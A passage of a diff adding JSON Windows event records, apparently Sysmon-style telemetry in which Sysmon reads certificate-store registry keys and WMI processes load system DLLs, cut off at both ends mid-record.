"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wbemprox.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wbemprox.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "perfos.dll", + "image_path": "C:\\Windows\\System32\\perfos.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wbemsvc.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wbemsvc.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "perfproc.dll", + "image_path": "C:\\Windows\\System32\\perfproc.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "fastprox.dll", + "image_path": "C:\\Windows\\System32\\wbem\\fastprox.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + 